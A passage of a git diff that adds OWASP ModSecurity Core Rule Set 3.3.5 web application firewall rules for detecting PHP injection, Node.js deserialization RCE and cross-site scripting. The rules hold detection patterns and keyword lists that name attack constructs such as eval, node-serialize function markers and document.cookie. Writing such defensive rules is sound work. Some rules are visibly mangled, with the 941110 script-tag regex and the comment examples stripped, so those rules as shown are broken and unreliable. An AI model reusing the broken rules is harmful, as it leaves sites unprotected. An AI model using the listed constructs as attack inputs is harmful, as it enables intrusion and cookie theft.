933130. +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:HTTP_(?:ACCEPT(?:_(?:ENCODING|LANGUAGE|CHARSET))?|(?:X_FORWARDED_FO|REFERE)R|(?:USER_AGEN|HOS)T|CONNECTION|KEEP_ALIVE)|PATH_(?:TRANSLATED|INFO)|ORIG_PATH_INFO|QUERY_STRING|REQUEST_URI|AUTH_TYPE)" \ + "id:933131,\ + phase:2,\ + block,\ + capture,\ + t:none,t:normalisePath,t:urlDecodeUni,\ + msg:'PHP Injection Attack: Variables Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Functions: Low-Value PHP Function Calls ] +# +# In paranoia level 3, we add additional checks for the remaining PHP functions. 
+# +# Most of these function names are likely to cause false positives in natural text +# or common parameter values, such as 'abs', 'copy', 'date', 'key', 'max', 'min'. +# Therefore, these function names are not scanned in lower paranoia levels. +# +# To mitigate the risk of false positives somewhat, a regexp is used to look for +# PHP function syntax. (See rule 933160 for a description.) +# +# This rule is a stricter sibling of rule 933160. +# +# This rule is also triggered by the following exploit(s): +# [ Apache Struts vulnerability CVE-2018-11776 - Exploit tested: https://www.exploit-db.com/exploits/45262 ] +# [ SAP CRM Java vulnerability CVE-2018-2380 - Exploit tested: https://www.exploit-db.com/exploits/44292 ] +# +# Regexp generated from util/regexp-assemble/regexp-933161.data using Regexp::Assemble. +# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage. +# +# Note that after assemble, PHP function syntax pre/postfix is added to the Regexp::Assemble +# output. 
Example: "@rx (?i)\bASSEMBLE_OUTPUT_HERE(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|ARGS_NAMES|ARGS|XML:/* "@rx (?i)\b(?:i(?:s(?:_(?:in(?:t(?:eger)?|finite)|n(?:u(?:meric|ll)|an)|(?:calla|dou)ble|s(?:calar|tring)|f(?:inite|loat)|re(?:source|al)|l(?:ink|ong)|a(?:rray)?|object|bool)|set)|n(?:(?:clud|vok)e|t(?:div|val))|(?:mplod|dat)e|conv)|s(?:t(?:r(?:(?:le|sp)n|coll)|at)|(?:e(?:rializ|ttyp)|huffl)e|i(?:milar_text|zeof|nh?)|p(?:liti?|rintf)|(?:candi|ubst)r|y(?:mlink|slog)|o(?:undex|rt)|leep|rand|qrt)|f(?:ile(?:(?:siz|typ)e|owner|pro)|l(?:o(?:atval|ck|or)|ush)|(?:rea|mo)d|t(?:ell|ok)|unction|close|gets|stat|eof)|c(?:h(?:o(?:wn|p)|eckdate|root|dir|mod)|o(?:(?:(?:nsta|u)n|mpac)t|sh?|py)|lose(?:dir|log)|(?:urren|ryp)t|eil)|e(?:x(?:(?:trac|i)t|p(?:lode)?)|a(?:ster_da(?:te|ys)|ch)|r(?:ror_log|egi?)|mpty|cho|nd)|l(?:o(?:g(?:1[0p])?|caltime)|i(?:nk(?:info)?|st)|(?:cfirs|sta)t|evenshtein|trim)|d(?:i(?:(?:skfreespac)?e|r(?:name)?)|e(?:fined?|coct)|(?:oubleva)?l|ate)|r(?:e(?:(?:quir|cod|nam)e|adlin[ek]|wind|set)|an(?:ge|d)|ound|sort|trim)|m(?:b(?:split|ereg)|i(?:crotime|n)|a(?:i[ln]|x)|etaphone|y?sql|hash)|u(?:n(?:(?:tain|se)t|iqid|link)|s(?:leep|ort)|cfirst|mask)|a(?:s(?:(?:se|o)rt|inh?)|r(?:sort|ray)|tan[2h]?|cosh?|bs)|t(?:e(?:xtdomain|mpnam)|a(?:int|nh?)|ouch|ime|rim)|h(?:e(?:ader(?:s_(?:lis|sen)t)?|brev)|ypot|ash)|p(?:a(?:thinfo|ck)|r(?:intf?|ev)|close|o[sw]|i)|g(?:et(?:t(?:ext|ype)|date)|mdate)|o(?:penlog|ctdec|rd)|b(?:asename|indec)|n(?:atsor|ex)t|k(?:sort|ey)|quotemeta|wordwrap|virtual|join)(?:\s|/\*.*\*/|//.*|#.*)*\(.*\)" \ + "id:933161,\ + phase:2,\ + block,\ + capture,\ + t:none,\ + msg:'PHP Injection Attack: Low-Value PHP Function Call Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + 
tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# +# [ PHP Script Uploads: Superfluous extension ] +# +# Block file uploads with PHP related extensions (.php, .phps, .phtml, +# .php5 etc) anywhere in the name, followed by a dot. +# +# Example: index.php.tmp +# +# Uploading of such files can lead to remote code execution if +# Apache is configured with AddType and MultiViews, as Apache will +# automatically do a filename match when the extension is unknown. +# This configuration is fortunately not common in modern installs. +# +# Blocking these file names might lead to more false positives. +# +# Some AJAX uploaders use the nonstandard request headers X-Filename, +# X_Filename, or X-File-Name to transmit the file name to the server; +# scan these request headers as well as multipart/form-data file names. +# +# This rule is a stricter sibling of rule 933110. 
+# +SecRule FILES|REQUEST_HEADERS:X-Filename|REQUEST_HEADERS:X_Filename|REQUEST_HEADERS:X.Filename|REQUEST_HEADERS:X-File-Name "@rx .*\.(?:php\d*|phtml)\..*$" \ + "id:933111,\ + phase:2,\ + block,\ + capture,\ + t:none,t:lowercase,\ + msg:'PHP Injection Attack: PHP Script File Upload Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +# [ PHP Closing Tag Found ] +# +# http://www.php.net/manual/en/language.basic-syntax.phptags.php +# +# This check was extracted from 933100 (paranoia level 1), since the +# checked sequence '?>' commonly causes false positives. +# See issue #654 for discussion. 
+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm ?>" \ + "id:933190,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,\ + msg:'PHP Injection Attack: PHP Closing Tag Found',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-php',\ + tag:'platform-multi',\ + tag:'attack-injection-php',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + tag:'paranoia-level/3',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.php_injection_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl3=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933017,phase:1,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:933018,phase:2,pass,nolog,skipAfter:END-REQUEST-933-APPLICATION-ATTACK-PHP" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-933-APPLICATION-ATTACK-PHP" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf new file mode 100644 index 000000000..89f495a94 --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-934-APPLICATION-ATTACK-NODEJS.conf 
@@ -0,0 +1,96 @@
+# ------------------------------------------------------------------------
+# OWASP ModSecurity Core Rule Set ver.3.3.5
+# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
+# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved.
+#
+# The OWASP ModSecurity Core Rule Set is distributed under
+# Apache Software License (ASL) version 2
+# Please see the enclosed LICENSE file for full details.
+# ------------------------------------------------------------------------
+
+#
+# -= Paranoia Level 0 (empty) =- (apply unconditionally)
+#
+
+
+
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934011,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
+SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:934012,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS"
+#
+# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher)
+#
+
+
+# [ Insecure unserialization / generic RCE signatures ]
+#
+# Libraries performing insecure unserialization:
+# - node-serialize: _$$ND_FUNC$$_ (CVE-2017-5941)
+# - funcster: __js_function
+#
+# See:
+# https://opsecx.com/index.php/2017/02/08/exploiting-node-js-deserialization-bug-for-remote-code-execution/
+# https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/
+#
+# Some generic snippets used:
+# - function() {
+# - new Function(
+# - eval(
+# - String.fromCharCode(
+#
+# Last two are used by nodejsshell.py,
+# https://github.com/ajinabraham/Node.Js-Security-Course/blob/master/nodejsshell.py
+#
+# As base64 is sometimes (but not always) used to encode serialized values,
+# use multiMatch and t:base64decode.
+#
+# Regexp generated from util/regexp-assemble/regexp-934100.data using Regexp::Assemble.
+# See https://coreruleset.org/20190826/optimizing-regular-expressions/ for usage.
+ +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:(?:_(?:\$\$ND_FUNC\$\$_|_js_function)|(?:new\s+Function|\beval)\s*\(|String\s*\.\s*fromCharCode|function\s*\(\s*\)\s*{|this\.constructor)|module\.exports\s*=)" \ + "id:934100,\ + phase:2,\ + block,\ + capture,\ + t:none,t:urlDecodeUni,t:base64Decode,\ + msg:'Node.js Injection Attack',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-javascript',\ + tag:'platform-multi',\ + tag:'attack-rce',\ + tag:'attack-injection-nodejs',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + multiMatch,\ + setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934013,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 2" "id:934014,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 2 =- (apply only when tx.executing_paranoia_level is sufficiently high: 2 or higher) +# + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934015,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 3" "id:934016,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 3 =- (apply only when tx.executing_paranoia_level is sufficiently high: 3 or higher) +# + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934017,phase:1,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 4" "id:934018,phase:2,pass,nolog,skipAfter:END-REQUEST-934-APPLICATION-ATTACK-NODEJS" +# +# -= Paranoia Level 4 =- (apply only when tx.executing_paranoia_level is sufficiently high: 4 
or higher) +# + + + +# +# -= Paranoia Levels Finished =- +# +SecMarker "END-REQUEST-934-APPLICATION-ATTACK-NODEJS" diff --git a/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf new file mode 100644 index 000000000..3b2376b9e --- /dev/null +++ b/src/common/core/modsecurity/files/coreruleset-v3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf 
@@ -0,0 +1,885 @@ +# ------------------------------------------------------------------------ +# OWASP ModSecurity Core Rule Set ver.3.3.5 +# Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. +# Copyright (c) 2021-2023 Core Rule Set project. All rights reserved. +# +# The OWASP ModSecurity Core Rule Set is distributed under +# Apache Software License (ASL) version 2 +# Please see the enclosed LICENSE file for full details. +# ------------------------------------------------------------------------ + +# +# -= Paranoia Level 0 (empty) =- (apply unconditionally) +# + + + +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941011,phase:1,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +SecRule TX:EXECUTING_PARANOIA_LEVEL "@lt 1" "id:941012,phase:2,pass,nolog,skipAfter:END-REQUEST-941-APPLICATION-ATTACK-XSS" +# +# -= Paranoia Level 1 (default) =- (apply only when tx.executing_paranoia_level is sufficiently high: 1 or higher) +# + + +# +# -=[ Libinjection - XSS Detection ]=- +# +# Ref: https://github.com/client9/libinjection +# Ref: https://speakerdeck.com/ngalbreath/libinjection-from-sqli-to-xss +# +# -=[ Targets ]=- +# +# 941100: PL1 : REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/| +# REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent| +# ARGS_NAMES|ARGS|XML:/* +# +# 941101: PL2 : REQUEST_HEADERS:Referer +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@detectXSS" \ + "id:941100,\ + phase:2,\ + block,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Attack Detected via libinjection',\ + logdata:'Matched Data: XSS data found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + 
severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 1 ]=- +# http://xssplayground.net23.net/xssfilter.html +# script tag based XSS vectors, e.g., +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_FILENAME|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)]*>[\s\S]*?" \ + "id:941110,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 1: Script Tag Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 2 ]=- +# XSS vectors making use of event handlers like onerror, onload etc, e.g., +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\"'`;\/0-9=\x0B\x09\x0C\x3B\x2C\x28\x3B]on[a-zA-Z]+[\s\x0B\x09\x0C\x3B\x2C\x28\x3B]*?=" \ + "id:941120,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 2: Event Handler Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ 
+ severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 3 ]=- +# +# Regexp generated from util/regexp-assemble/regexp-941130.data using Regexp::Assemble. +# To rebuild the regexp: +# cd util/regexp-assemble +# ./regexp-assemble.pl regexp-941130.data +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|ARGS_NAMES|ARGS|XML:/* "@rx (?i)[\s\S](?:!ENTITY\s+(?:\S+|%\s+\S+)\s+(?:PUBLIC|SYSTEM)|x(?:link:href|html|mlns)|data:text\/html|pattern\b.*?=|formaction|\@import|;base64)\b" \ + "id:941130,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 3: Attribute Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ XSS Filters - Category 4 ]=- +# XSS vectors making use of javascript uri and tags, e.g.,

+# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\b[^>]*?>[\s\S]*?|(?:=|U\s*?R\s*?L\s*?\()\s*?[^>]*?\s*?S\s*?C\s*?R\s*?I\s*?P\s*?T\s*?:)" \ + "id:941140,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'XSS Filter - Category 4: Javascript URI Vector',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# -=[ NoScript XSS Filters ]=- +# Ref: http://noscript.net/ +# +# [NoScript InjectionChecker] HTML injection +# +# Regexp generated from util/regexp-assemble/regexp-941160.data using Regexp::Assemble. +# To rebuild the regexp: +# cd util/regexp-assemble +# ./regexp-assemble.pl regexp-941160.data +# Note that after assemble an ignore case flag (i) is added to the to the Regexp::Assemble output: +# Add ignore case flag between '?' 
and ':': "(?i:...)" +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i:(?:<\w[\s\S]*[\s\/]|['\"](?:[\s\S]*[\s\/])?)(?:on(?:d(?:e(?:vice(?:(?:orienta|mo)tion|proximity|found|light)|livery(?:success|error)|activate)|r(?:ag(?:e(?:n(?:ter|d)|xit)|(?:gestur|leav)e|start|drop|over)|op)|i(?:s(?:c(?:hargingtimechange|onnect(?:ing|ed))|abled)|aling)|ata(?:setc(?:omplete|hanged)|(?:availabl|chang)e|error)|urationchange|ownloading|blclick)|Moz(?:M(?:agnifyGesture(?:Update|Start)?|ouse(?:PixelScroll|Hittest))|S(?:wipeGesture(?:Update|Start|End)?|crolledAreaChanged)|(?:(?:Press)?TapGestur|BeforeResiz)e|EdgeUI(?:C(?:omplet|ancel)|Start)ed|RotateGesture(?:Update|Start)?|A(?:udioAvailable|fterPaint))|c(?:o(?:m(?:p(?:osition(?:update|start|end)|lete)|mand(?:update)?)|n(?:t(?:rolselect|extmenu)|nect(?:ing|ed))|py)|a(?:(?:llschang|ch)ed|nplay(?:through)?|rdstatechange)|h(?:(?:arging(?:time)?ch)?ange|ecking)|(?:fstate|ell)change|u(?:echange|t)|l(?:ick|ose))|s(?:t(?:a(?:t(?:uschanged|echange)|lled|rt)|k(?:sessione|comma)nd|op)|e(?:ek(?:complete|ing|ed)|(?:lec(?:tstar)?)?t|n(?:ding|t))|(?:peech|ound)(?:start|end)|u(?:ccess|spend|bmit)|croll|how)|m(?:o(?:z(?:(?:pointerlock|fullscreen)(?:change|error)|(?:orientation|time)change|network(?:down|up)load)|use(?:(?:lea|mo)ve|o(?:ver|ut)|enter|wheel|down|up)|ve(?:start|end)?)|essage|ark)|a(?:n(?:imation(?:iteration|start|end)|tennastatechange)|fter(?:(?:scriptexecu|upda)te|print)|udio(?:process|start|end)|d(?:apteradded|dtrack)|ctivate|lerting|bort)|b(?:e(?:fore(?:(?:(?:de)?activa|scriptexecu)te|u(?:nload|pdate)|p(?:aste|rint)|c(?:opy|ut)|editfocus)|gin(?:Event)?)|oun(?:dary|ce)|l(?:ocked|ur)|roadcast|usy)|DOM(?:Node(?:Inserted(?:IntoDocument)?|Removed(?:FromDocument)?)|(?:CharacterData|Subtree)Modified|A(?:ttrModified|ctivate)|Focus(?:Out|In)|MouseScroll)|r(?:e(?:s(?:u(?:m(?:ing|e)|lt)|ize|et)|adystatechange|pea(?:tEven)?t|movetrack|trievi
ng|ceived)|ow(?:s(?:inserted|delete)|e(?:nter|xit))|atechange)|p(?:op(?:up(?:hid(?:den|ing)|show(?:ing|n))|state)|a(?:ge(?:hide|show)|(?:st|us)e|int)|ro(?:pertychange|gress)|lay(?:ing)?)|t(?:ouch(?:(?:lea|mo)ve|en(?:ter|d)|cancel|start)|ransition(?:cancel|end|run)|ime(?:update|out)|ext)|u(?:s(?:erproximity|sdreceived)|p(?:gradeneeded|dateready)|n(?:derflow|load))|f(?:o(?:rm(?:change|input)|cus(?:out|in)?)|i(?:lterchange|nish)|ailed)|l(?:o(?:ad(?:e(?:d(?:meta)?data|nd)|start)|secapture)|evelchange|y)|g(?:amepad(?:(?:dis)?connected|button(?:down|up)|axismove)|et)|e(?:n(?:d(?:Event|ed)?|abled|ter)|rror(?:update)?|mptied|xit)|i(?:cc(?:cardlockerror|infochange)|n(?:coming|valid|put))|o(?:(?:(?:ff|n)lin|bsolet)e|verflow(?:changed)?|pen)|SVG(?:(?:Unl|L)oad|Resize|Scroll|Abort|Error|Zoom)|h(?:e(?:adphoneschange|l[dp])|ashchange|olding)|v(?:o(?:lum|ic)e|ersion)change|w(?:a(?:it|rn)ing|heel)|key(?:press|down|up)|(?:AppComman|Loa)d|no(?:update|match)|Request|zoom)|s(?:tyle|rc)|background|formaction|lowsrc|ping)[\s\x08]*?=|<[^\w<>]*(?:[^<>\"'\s]*:)?[^\w<>]*\W*?(?:(?:a\W*?(?:n\W*?i\W*?m\W*?a\W*?t\W*?e|p\W*?p\W*?l\W*?e\W*?t|u\W*?d\W*?i\W*?o)|b\W*?(?:i\W*?n\W*?d\W*?i\W*?n\W*?g\W*?s|a\W*?s\W*?e|o\W*?d\W*?y)|i?\W*?f\W*?r\W*?a\W*?m\W*?e|o\W*?b\W*?j\W*?e\W*?c\W*?t|i\W*?m\W*?a?\W*?g\W*?e?|e\W*?m\W*?b\W*?e\W*?d|p\W*?a\W*?r\W*?a\W*?m|v\W*?i\W*?d\W*?e\W*?o|l\W*?i\W*?n\W*?k)[^>\w]|s\W*?(?:c\W*?r\W*?i\W*?p\W*?t|t\W*?y\W*?l\W*?e|e\W*?t[^>\w]|v\W*?g)|m\W*?(?:a\W*?r\W*?q\W*?u\W*?e\W*?e|e\W*?t\W*?a[^>\w])|f\W*?o\W*?r\W*?m))" \ + "id:941160,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: HTML Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + 
ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [NoScript InjectionChecker] Attributes injection +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:Referer|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:\W|^)(?:javascript:(?:[\s\S]+[=\\\(\[\.<]|[\s\S]*?(?:\bname\b|\\[ux]\d))|data:(?:(?:[a-z]\w+\/\w[\w+-]+\w)?[;,]|[\s\S]*?;[\s\S]*?\b(?:base64|charset=)|[\s\S]*?,[\s\S]*?<[\s\S]*?\w[\s\S]*?>))|@\W*?i\W*?m\W*?p\W*?o\W*?r\W*?t\W*?(?:\/\*[\s\S]*?)?(?:[\"']|\W*?u\W*?r\W*?l[\s\S]*?\()|\W*?-\W*?m\W*?o\W*?z\W*?-\W*?b\W*?i\W*?n\W*?d\W*?i\W*?n\W*?g[\s\S]*?:[\s\S]*?\W*?u\W*?r\W*?l[\s\S]*?\(" \ + "id:941170,\ + phase:2,\ + block,\ + capture,\ + t:none,t:utf8toUnicode,t:urlDecodeUni,t:htmlEntityDecode,t:jsDecode,t:cssDecode,t:removeNulls,\ + msg:'NoScript XSS InjectionChecker: Attribute Injection',\ + logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ + tag:'application-multi',\ + tag:'language-multi',\ + tag:'platform-multi',\ + tag:'attack-xss',\ + tag:'paranoia-level/1',\ + tag:'OWASP_CRS',\ + tag:'capec/1000/152/242',\ + ctl:auditLogParts=+E,\ + ver:'OWASP_CRS/3.3.5',\ + severity:'CRITICAL',\ + setvar:'tx.xss_score=+%{tx.critical_anomaly_score}',\ + setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + + +# +# [Blacklist Keywords from Node-Validator] +# https://raw.github.com/chriso/node-validator/master/validator.js +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@pm document.cookie document.write .parentnode .innerhtml window.location -moz-binding 